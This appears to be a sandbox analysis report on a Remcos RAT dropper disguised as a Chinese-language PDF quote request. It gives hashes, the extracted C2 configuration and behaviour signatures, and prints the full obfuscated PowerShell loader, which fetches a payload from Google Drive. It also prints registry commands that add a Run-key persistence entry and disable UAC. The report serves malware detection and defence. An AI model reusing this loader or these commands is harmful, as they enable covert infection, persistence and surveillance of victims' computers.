Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

NTU 報價...df.vbs

windows7-x64

8

NTU 報價...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/11/2024, 13:23 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NTU 報價請求項目 FMD2024UOS·pdf.vbs

  • Size

    15KB

  • MD5

    7a8593917a881f736dae40fd3e739aa9

  • SHA1

    86f696ac97647bac9ef92b24e0818a97a70aee53

  • SHA256

    424d1b064b6e0a04e251193013187b35a779473df7411dcc285dc1284cf618d7

  • SHA512

    66ee428b08ac48a8550eeec67d3f41540dfb792e24408bb84a08888c69468dec834d0cff167cb62790f14277d35d173f239ee59b4af1c4fddd6b29b6169ed132

  • SSDEEP

    192:qzb9JpgciToUkIWTErzlS8HIYVFlXQNE7VrMPQ2cV3766aT0VA:SbLuXTiTErZSCH3gNEmyPVA

Score
10/10
remcosremotehostdiscoveryevasionexecutionpersistencerattrojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-4EN793

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 64 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NTU 報價請求項目 FMD2024UOS·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2628
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#agamemnon Rentekoder Hypaton Sumpegnenes #>;$Decursion='Brancher';<#Haploses Lecanine Phorrhea Xylomancy #>; function Feltprovsts($Whitethorn93){If ($host.DebuggerEnabled) {$merginae++;}$Arrestants=$Zoea+$Whitethorn93.'Length' - $merginae; for ( $Valgteknisk=4;$Valgteknisk -lt $Arrestants;$Valgteknisk+=5){$Sengekanten132=$Valgteknisk;$Fremtidsmulighedernes185+=$Whitethorn93[$Valgteknisk];}$Fremtidsmulighedernes185;}function Bstrup($Centrifugalpumpe){ & ($Lotuses) ($Centrifugalpumpe);}$kisra=Feltprovsts 'AdmoM UlkoSkilzVeheiO.enlblanlConcaEbcd/Tele ';$Forestful=Feltprovsts 'BenzTSpralPosisSugg1 Hyl2Vurd ';$Anetavlerne=' nex[ AnuNDommE rooTPict. umS.ingeE sprM rav rdi Polc onrEDiskpIndbOCrioINonmn ImbtFlorm He A nsuNSonaARoamgTer,ElapiRAbri]Hapl:Perv:FalsSKonteKaldCAlteU Ba.rUn aiKvgptK tcYAfstpModsR NumoHe,dt elo agtCUnadoEarwlForu=W ol$A.etFAndeOQuarR coleBogsSAmphTChefF M rUO.ziLKako ';$kisra+=Feltprovsts 'Sk l5 Afs. Reg0Awhe Ulm,(zelaW KuliEskanFor.dShi oBanewFodbsSego ForeNAutoT,ail Fali1 Udk0Kokk.S,ip0Sp.r; Sub Ru.nW.eltiAri.nHelt6sf,r4Sign;Fo,s Commx cyt6Refu4Epan; Si Pho r anvGain: K.l1Pejs3Musi1Poco.lav 0Slbe)Appr Sub GJordeElemcTanakSupeoShlu/Prog2Diab0had 1Bi e0Ansl0Udl,1 A s0Char1Peas TjrF.remiDemor rhveUnprfD.yloCactxCa p/U pr1Bi d3Hydr1Offe.Supp0M ul ';$Polar=Feltprovsts 'CockUDagbsSagiePantRForr- KonAGrusgtamaEAgl.nK,ltTOvis ';$Misbelieving=Feltprovsts 'Sch hDatatTramtMisspB.res f,e: K t/Tril/.movdTaagrBkkei KirvSubsetvan. TingTrsko nano OvegTryglChrye No .PortcFo so E.om ub/Po puKimbc All?P unequeexTracpUdkro AutrPreit ,ea=Eat.d B.loB,llwSc onSubclAnkeohejsaP osdAdel&SlaniTidsd Hin=Nonz1Jarrv Quil SmaiTesknPleoaSi twBuesC P rC,ageD UnmdGrecnZen Caffr8A.opGRkenaUpr rfarmsBar rUnf,IPran_ Ek ERep oInsaya toHWale1 ManNHemiC carS Ove5Fuml8 Un,C UncwBr e ';$Bevilliget=Feltprovsts 'Auto>Sabb ';$Lotuses=Feltprovsts 'TricI herEFingXDire ';$Valgtekniskmpinge='Slverglderne';$Maltsters='\Inflicts.Kol';Bstrup (Feltprovsts ' Mi $B.kmg usLNephO ffebForpaViaml upe: DesS TyvtallertherASyllp ortPPer.eKultTGuds=Tryk$tallEggehN Sgev Str: M sAVisiPHderpDu eDR,anAHatttPergaGard+ til$SortmdumbaBekol Ci.TByggsMunitSaksePinar P asmega ');Bstrup (Feltprovsts 'Elev$ HstGSameL GreoD.libBarba UdlL Sph:j dgr,rokaVedhALineKTurnORegnsBygnTModej FraeRhinrStreNBolv=Kitt$PkwyM.atuIm.weS Bl,bOvere B wL Fo iSkr e BikvStvsISkranDomsgunde.synsS mgrp yrlAgnoI Tott S k(Mowl$GaibBBlomE C uvAt.oIUndeL FryLBaudIO ttgAf,oeUberTStr ) Cat ');Bstrup (Feltprovsts $Anetavlerne);$Misbelieving=$Raakostjern[0];$Cynoxylon9=(Feltprovsts 'Dukk$Un oGSid LRektO Pe.B yroASav,l lus:BodeCZamboSparr avrValuA.nvosthadICos oChalnNagk1Cont2Him,1 O,p=ArchNGange UniWSkil-SmaaOIcelBA miJPy aeRokkCPartTJa,u Gup.SE teYEwassMatrTNordE AnamPoli. OppnKorneTndct Non.E lewPersE DecBFeriCSul,lKrici,ompeI,jiNRiddtanti ');Bstrup ($Cynoxylon9);Bstrup (Feltprovsts 'Bigr$Un oC,atuoTilbrOverrIonia NonsIncoi ImmoDiscnHal,1Fors2 Isf1.ame.Pen HT.roe CoaaUnfidMoste nker la,sCloc[ ,ng$CeruPAlveoD vilStr aSpdbr Ext]flas=Cuff$ GrokSo.riHaemsMockrSperaTal ');$Gnomic=Feltprovsts ' opv$ArtiC .ipoKa.irChibr igtaSskes iltiGratoSmrrnMona1 sup2Comm1F tt.Ge.mDPolyo tilw st n StnlSpgeoBelia Sv dSte FDogbiB hol,fgaeSkyl(Unex$ DuaMG ssi Hyps.igsbSahaePrimlRabaiKoffeUnm v.ncaiRessn alkg ,tj,Phar$.aksKT knn Sexi,hesrVangkIndveNonprDes iGamoeBic rolie) Tha ';$Knirkerier=$Strappet;Bstrup (Feltprovsts ' P i$F.legSbekLSl poLeprBskemaUn clUnst:til b TitL nopvGlamr ForeT.rpd skre For=Imag( ngsTHemoEGameSLo,qT Fly-Vk tpAppra CacT TyrHUnse Ro $ aviK PenNSlynIUngiRHos,KBra E AutRElekipup.E Trar Lo,)Diat ');while (!$Blvrede) {Bstrup (Feltprovsts ' No $DerhgTyggl alsoKrepb Ga aRaptlUdlu:MidsAWartb U fjN,neeAf.icParat andn Bo.eDigts RhesOc.a=Fluo$abtutacinrTrenuUnsleDrug ') ;Bstrup $Gnomic;Bstrup (Feltprovsts ' rouSJagttU,faAI drRBractLuna-CoucS K flBorgEnaphESupePNavl Use4Rezo ');Bstrup (Feltprovsts 'Cop $ UndGFarvLPat O Pu B,ulpaWorsL dre:Sch.b B alMurivK.rorStraeGaleD UndEAkac=Pret(Sk ttTjleeCe,bs EsttA,en- O ePBlomaSt dTknivHP.em Ord$Myelk F sNDunkiSnigr.ormk BrdEAnteRTimeiFodleThorR Kru),ini ') ;Bstrup (Feltprovsts ' Lur$flskGligeLFo,dO TymBThyrAGrunLAcce: putcPropoGor EI kbnMystzS neySolfm T nAJespTKberI FuncRoug= Fi $Snu GPatrLGldeoObjeb AntANegoLSele: UnpR peruPrveSPleue ellRGlacN Bree Kap+Ahea+ S,r% Kvl$u,orRVeinAT.ltASmokK,vioOPampsBjrgtRe.eJTerrEAnpaRD.scNReor.PlesCMegroroc USk snRystt Klu ') ;$Misbelieving=$Raakostjern[$Coenzymatic];}$Sympathique=315454;$Rhatanies=31106;Bstrup (Feltprovsts ' ugl$ SubgdlvyLCameo Un,bKnudaFjorLChef:MellkSmedy Ya,s Snut MonkUne lA phIMonomSmdeaMyose Mart m s riv=Bear d rigSoveeb dgtPres-RehnCHystoT arnS urTNongELiseNUdk,t ele Ineb$RugkKOxyaN Lsei Mo rPortKIso,E F.nrPhociAntiEUn.lr ,it ');Bstrup (Feltprovsts 'Brsr$ Forg estlKostoI dsbInfiaprocl,art: IradMilie blid FejiJordkCh na AdetSik,iColuo ThenEucgs GraeSyerk Brns.teleRaadmSamspDrejlCo.raS nor edaeCigardialnElekeAssesV nv Refu=Allo Mill[vrleSMi,iyUnlisIndatTr.pe Svim K s.OeilCKalkoSuggnA.stvHeaveTag rVaretSina] Ene: ro:Ko.mF Indr oxpoShotmForaB nda vrssa ieSk.t6S ri4Hg,pSov rtIdiorBookiOchfnOut gTriv(Rebr$Ci iKHypey aftsdiskt .ackEleklUdtri mkkmSulka Supe ,ectTorb)Enef ');Bstrup (Feltprovsts 'Vurd$SkivGFgtnL copOPre BsexoAOrculMa,d:DesoVVitiI nsuc MinEr weL .coIsta KskeeEGe,z Impu=.ext regg[Antis snYMuttsPo eTNymaeGaapM iru.TuritPoole lnsxsyslt ong.Kbe e NewnPrelCKoraO TraD ReciU stN Gc Gblte]Kern:Tote: Vsea.ncosB whCUnoiiBenwiCirc. Mi GMandeRdhat afbsBoucT,rapRSa vit aaNUdleGByeg(,uto$ S ld komeC,amDOverIOchoK kriATrocT nhIEnhaOPeriNFlansskrue IarKRdbrsFe tECo.eMi teptrapL T.oARungrDataeLabbrDropN PneeSupesProd)Reco ');Bstrup (Feltprovsts 'Red.$MetrgSvu lTeglOStatbunc.a LaslB,rd: bedpP etoQuadt ChoeK.rasRegit quaA efrTRec E Mis=Frer$UnduVKargITvisC TveE linl ArbIM ndKKlasE lf. .crSFoulUEm,rbUn,eStoaktBeguRstiniTurrnBor GBaro( ith$Begys ,xpYMar,MSoegPF.rsAKonttStavHMumliAgilq Kemu IndESm,s, ,il$ M,trWageH ,taaSlovtb,bbaCatiN ildiEromEGa.oSUnu )Cupo ');Bstrup $Potestate;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2892
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#agamemnon Rentekoder Hypaton Sumpegnenes #>;$Decursion='Brancher';<#Haploses Lecanine Phorrhea Xylomancy #>; function Feltprovsts($Whitethorn93){If ($host.DebuggerEnabled) {$merginae++;}$Arrestants=$Zoea+$Whitethorn93.'Length' - $merginae; for ( $Valgteknisk=4;$Valgteknisk -lt $Arrestants;$Valgteknisk+=5){$Sengekanten132=$Valgteknisk;$Fremtidsmulighedernes185+=$Whitethorn93[$Valgteknisk];}$Fremtidsmulighedernes185;}function Bstrup($Centrifugalpumpe){ & ($Lotuses) ($Centrifugalpumpe);}$kisra=Feltprovsts 'AdmoM UlkoSkilzVeheiO.enlblanlConcaEbcd/Tele ';$Forestful=Feltprovsts 'BenzTSpralPosisSugg1 Hyl2Vurd ';$Anetavlerne=' nex[ AnuNDommE rooTPict. umS.ingeE sprM rav rdi Polc onrEDiskpIndbOCrioINonmn ImbtFlorm He A nsuNSonaARoamgTer,ElapiRAbri]Hapl:Perv:FalsSKonteKaldCAlteU Ba.rUn aiKvgptK tcYAfstpModsR NumoHe,dt elo agtCUnadoEarwlForu=W ol$A.etFAndeOQuarR coleBogsSAmphTChefF M rUO.ziLKako ';$kisra+=Feltprovsts 'Sk l5 Afs. Reg0Awhe Ulm,(zelaW KuliEskanFor.dShi oBanewFodbsSego ForeNAutoT,ail Fali1 Udk0Kokk.S,ip0Sp.r; Sub Ru.nW.eltiAri.nHelt6sf,r4Sign;Fo,s Commx cyt6Refu4Epan; Si Pho r anvGain: K.l1Pejs3Musi1Poco.lav 0Slbe)Appr Sub GJordeElemcTanakSupeoShlu/Prog2Diab0had 1Bi e0Ansl0Udl,1 A s0Char1Peas TjrF.remiDemor rhveUnprfD.yloCactxCa p/U pr1Bi d3Hydr1Offe.Supp0M ul ';$Polar=Feltprovsts 'CockUDagbsSagiePantRForr- KonAGrusgtamaEAgl.nK,ltTOvis ';$Misbelieving=Feltprovsts 'Sch hDatatTramtMisspB.res f,e: K t/Tril/.movdTaagrBkkei KirvSubsetvan. TingTrsko nano OvegTryglChrye No .PortcFo so E.om ub/Po puKimbc All?P unequeexTracpUdkro AutrPreit ,ea=Eat.d B.loB,llwSc onSubclAnkeohejsaP osdAdel&SlaniTidsd Hin=Nonz1Jarrv Quil SmaiTesknPleoaSi twBuesC P rC,ageD UnmdGrecnZen Caffr8A.opGRkenaUpr rfarmsBar rUnf,IPran_ Ek ERep oInsaya toHWale1 ManNHemiC carS Ove5Fuml8 Un,C UncwBr e ';$Bevilliget=Feltprovsts 'Auto>Sabb ';$Lotuses=Feltprovsts 'TricI herEFingXDire ';$Valgtekniskmpinge='Slverglderne';$Maltsters='\Inflicts.Kol';Bstrup (Feltprovsts ' Mi $B.kmg usLNephO ffebForpaViaml upe: DesS TyvtallertherASyllp ortPPer.eKultTGuds=Tryk$tallEggehN Sgev Str: M sAVisiPHderpDu eDR,anAHatttPergaGard+ til$SortmdumbaBekol Ci.TByggsMunitSaksePinar P asmega ');Bstrup (Feltprovsts 'Elev$ HstGSameL GreoD.libBarba UdlL Sph:j dgr,rokaVedhALineKTurnORegnsBygnTModej FraeRhinrStreNBolv=Kitt$PkwyM.atuIm.weS Bl,bOvere B wL Fo iSkr e BikvStvsISkranDomsgunde.synsS mgrp yrlAgnoI Tott S k(Mowl$GaibBBlomE C uvAt.oIUndeL FryLBaudIO ttgAf,oeUberTStr ) Cat ');Bstrup (Feltprovsts $Anetavlerne);$Misbelieving=$Raakostjern[0];$Cynoxylon9=(Feltprovsts 'Dukk$Un oGSid LRektO Pe.B yroASav,l lus:BodeCZamboSparr avrValuA.nvosthadICos oChalnNagk1Cont2Him,1 O,p=ArchNGange UniWSkil-SmaaOIcelBA miJPy aeRokkCPartTJa,u Gup.SE teYEwassMatrTNordE AnamPoli. OppnKorneTndct Non.E lewPersE DecBFeriCSul,lKrici,ompeI,jiNRiddtanti ');Bstrup ($Cynoxylon9);Bstrup (Feltprovsts 'Bigr$Un oC,atuoTilbrOverrIonia NonsIncoi ImmoDiscnHal,1Fors2 Isf1.ame.Pen HT.roe CoaaUnfidMoste nker la,sCloc[ ,ng$CeruPAlveoD vilStr aSpdbr Ext]flas=Cuff$ GrokSo.riHaemsMockrSperaTal ');$Gnomic=Feltprovsts ' opv$ArtiC .ipoKa.irChibr igtaSskes iltiGratoSmrrnMona1 sup2Comm1F tt.Ge.mDPolyo tilw st n StnlSpgeoBelia Sv dSte FDogbiB hol,fgaeSkyl(Unex$ DuaMG ssi Hyps.igsbSahaePrimlRabaiKoffeUnm v.ncaiRessn alkg ,tj,Phar$.aksKT knn Sexi,hesrVangkIndveNonprDes iGamoeBic rolie) Tha ';$Knirkerier=$Strappet;Bstrup (Feltprovsts ' P i$F.legSbekLSl poLeprBskemaUn clUnst:til b TitL nopvGlamr ForeT.rpd skre For=Imag( ngsTHemoEGameSLo,qT Fly-Vk tpAppra CacT TyrHUnse Ro $ aviK PenNSlynIUngiRHos,KBra E AutRElekipup.E Trar Lo,)Diat ');while (!$Blvrede) {Bstrup (Feltprovsts ' No $DerhgTyggl alsoKrepb Ga aRaptlUdlu:MidsAWartb U fjN,neeAf.icParat andn Bo.eDigts RhesOc.a=Fluo$abtutacinrTrenuUnsleDrug ') ;Bstrup $Gnomic;Bstrup (Feltprovsts ' rouSJagttU,faAI drRBractLuna-CoucS K flBorgEnaphESupePNavl Use4Rezo ');Bstrup (Feltprovsts 'Cop $ UndGFarvLPat O Pu B,ulpaWorsL dre:Sch.b B alMurivK.rorStraeGaleD UndEAkac=Pret(Sk ttTjleeCe,bs EsttA,en- O ePBlomaSt dTknivHP.em Ord$Myelk F sNDunkiSnigr.ormk BrdEAnteRTimeiFodleThorR Kru),ini ') ;Bstrup (Feltprovsts ' Lur$flskGligeLFo,dO TymBThyrAGrunLAcce: putcPropoGor EI kbnMystzS neySolfm T nAJespTKberI FuncRoug= Fi $Snu GPatrLGldeoObjeb AntANegoLSele: UnpR peruPrveSPleue ellRGlacN Bree Kap+Ahea+ S,r% Kvl$u,orRVeinAT.ltASmokK,vioOPampsBjrgtRe.eJTerrEAnpaRD.scNReor.PlesCMegroroc USk snRystt Klu ') ;$Misbelieving=$Raakostjern[$Coenzymatic];}$Sympathique=315454;$Rhatanies=31106;Bstrup (Feltprovsts ' ugl$ SubgdlvyLCameo Un,bKnudaFjorLChef:MellkSmedy Ya,s Snut MonkUne lA phIMonomSmdeaMyose Mart m s riv=Bear d rigSoveeb dgtPres-RehnCHystoT arnS urTNongELiseNUdk,t ele Ineb$RugkKOxyaN Lsei Mo rPortKIso,E F.nrPhociAntiEUn.lr ,it ');Bstrup (Feltprovsts 'Brsr$ Forg estlKostoI dsbInfiaprocl,art: IradMilie blid FejiJordkCh na AdetSik,iColuo ThenEucgs GraeSyerk Brns.teleRaadmSamspDrejlCo.raS nor edaeCigardialnElekeAssesV nv Refu=Allo Mill[vrleSMi,iyUnlisIndatTr.pe Svim K s.OeilCKalkoSuggnA.stvHeaveTag rVaretSina] Ene: ro:Ko.mF Indr oxpoShotmForaB nda vrssa ieSk.t6S ri4Hg,pSov rtIdiorBookiOchfnOut gTriv(Rebr$Ci iKHypey aftsdiskt .ackEleklUdtri mkkmSulka Supe ,ectTorb)Enef ');Bstrup (Feltprovsts 'Vurd$SkivGFgtnL copOPre BsexoAOrculMa,d:DesoVVitiI nsuc MinEr weL .coIsta KskeeEGe,z Impu=.ext regg[Antis snYMuttsPo eTNymaeGaapM iru.TuritPoole lnsxsyslt ong.Kbe e NewnPrelCKoraO TraD ReciU stN Gc Gblte]Kern:Tote: Vsea.ncosB whCUnoiiBenwiCirc. Mi GMandeRdhat afbsBoucT,rapRSa vit aaNUdleGByeg(,uto$ S ld komeC,amDOverIOchoK kriATrocT nhIEnhaOPeriNFlansskrue IarKRdbrsFe tECo.eMi teptrapL T.oARungrDataeLabbrDropN PneeSupesProd)Reco ');Bstrup (Feltprovsts 'Red.$MetrgSvu lTeglOStatbunc.a LaslB,rd: bedpP etoQuadt ChoeK.rasRegit quaA efrTRec E Mis=Frer$UnduVKargITvisC TveE linl ArbIM ndKKlasE lf. .crSFoulUEm,rbUn,eStoaktBeguRstiniTurrnBor GBaro( ith$Begys ,xpYMar,MSoegPF.rsAKonttStavHMumliAgilq Kemu IndESm,s, ,il$ M,trWageH ,taaSlovtb,bbaCatiN ildiEromEGa.oSUnu )Cupo ');Bstrup $Potestate;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:624
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1620
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stephanurus% -windowstyle 1 $Optagelseskravets=(gp -Path 'HKCU:\Software\Upholstering\').Playscript;%Stephanurus% ($Optagelseskravets)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2264
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Stephanurus% -windowstyle 1 $Optagelseskravets=(gp -Path 'HKCU:\Software\Upholstering\').Playscript;%Stephanurus% ($Optagelseskravets)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3836
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:892

Network

  • flag-us
    DNS
    88.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.210.23.2.in-addr.arpa
    IN PTR
    Response
    88.210.23.2.in-addr.arpa
    IN PTR
    a2-23-210-88deploystaticakamaitechnologiescom
  • flag-us
    DNS
    drive.google.com
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.google.com
    IN A
    Response
    drive.google.com
    IN A
    142.250.187.206
  • flag-gb
    GET
    https://drive.google.com/uc?export=download&id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw
    powershell.exe
    Remote address:
    142.250.187.206:443
    Request
    GET /uc?export=download&id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Thu, 14 Nov 2024 13:23:45 GMT
    Location: https://drive.usercontent.google.com/download?id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw&export=download
    Strict-Transport-Security: max-age=31536000
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-TGJ4MAriJPIY4OJnBlZS0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.187.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.187.250.142.in-addr.arpa
    IN PTR
    Response
    206.187.250.142.in-addr.arpa
    IN PTR
    lhr25s33-in-f141e100net
  • flag-us
    DNS
    drive.usercontent.google.com
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    drive.usercontent.google.com
    IN A
    Response
    drive.usercontent.google.com
    IN A
    142.250.180.1
  • flag-gb
    GET
    https://drive.usercontent.google.com/download?id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw&export=download
    powershell.exe
    Remote address:
    142.250.180.1:443
    Request
    GET /download?id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="Carcinogenicity.fla"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, 